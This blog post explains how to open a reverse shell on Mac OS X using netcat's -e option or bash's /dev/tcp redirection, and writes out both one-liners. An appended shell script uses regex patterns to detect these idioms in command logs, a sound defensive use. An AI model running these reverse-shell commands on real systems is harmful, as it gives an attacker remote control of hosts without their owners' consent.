Friday, March 19, 2010

Netcat on Mac OS X

netcat (nc) is a utility for opening arbitrary TCP and UDP connections. According to the nc manual, the -e option specifies a program to exec after the connection is established. Thus, in general, we can easily make a reverse shell with this command:
nc <addr> <port> -e /bin/sh

However, nc on Mac does not have the -e option. Instead, the bash shipped with Mac OS X is built with network redirection enabled (the /dev/tcp and /dev/udp pseudo-paths). Thus, instead of using nc for a reverse shell, we can simply use this command:
/bin/bash 0</dev/tcp/addr/port 1>&0 2>&0

Note that this will not work on default Debian machines: the bash there has to be rebuilt with network redirection enabled before /dev/tcp and /dev/udp are available.

Useful reference: http://shudder.daemonette.org/source/BashNP-Guide.txt
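As an added example, not part of the original post, here is a small POSIX shell script that flags command lines using either idiom above (bash /dev/tcp or /dev/udp redirection, or nc with -e), the kind of check one would run over exported shell history or process-audit records when reviewing a host. The sample command lines and their addresses are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: flag shell command lines that use
# either reverse-shell idiom discussed above. Reads one command line per line
# on stdin (e.g. exported shell history or process-audit records) and prints
# each match tagged with the idiom it uses.

# Constructed sample input; 192.0.2.10 is an RFC 5737 documentation address.
SAMPLE_CMDS='/bin/bash 0</dev/tcp/192.0.2.10/4444 1>&0 2>&0
nc 192.0.2.10 4444 -e /bin/sh
nc -l -p 8080
exec 3<>/dev/udp/192.0.2.10/53
echo hello > /dev/null
nc -zv 192.0.2.10 22'

# bash network redirection: /dev/tcp/<host>/<port> or /dev/udp/<host>/<port>
NET_REDIRECT_RE='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'
# nc, ncat or netcat invoked with "-e <program>"
NC_EXEC_RE='(^|[[:space:]/])(nc|ncat|netcat)[[:space:]].*[[:space:]]-e[[:space:]]+[^[:space:]]'

# Print every input line matching either idiom, prefixed with a tag.
flag_reverse_shell_cmds() {
  while IFS= read -r cmd; do
    if printf '%s\n' "$cmd" | grep -Eq "$NET_REDIRECT_RE"; then
      printf 'NET_REDIRECT\t%s\n' "$cmd"
    elif printf '%s\n' "$cmd" | grep -Eq "$NC_EXEC_RE"; then
      printf 'NC_EXEC\t%s\n' "$cmd"
    fi
  done
}

# Number of flagged lines in the constructed sample (3: two /dev/* redirects
# and one nc -e; the listener, port scan and /dev/null lines are not flagged).
count_flagged_sample() {
  printf '%s\n' "$SAMPLE_CMDS" | flag_reverse_shell_cmds | grep -c .
}

printf '%s\n' "$SAMPLE_CMDS" | flag_reverse_shell_cmds
```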

About

Hi, I am a PhD candidate at CMU. I was one of the founding members of PPP (Plaid Parliament of Pwning). I like programming in OCaml, F#, Haskell, and C++.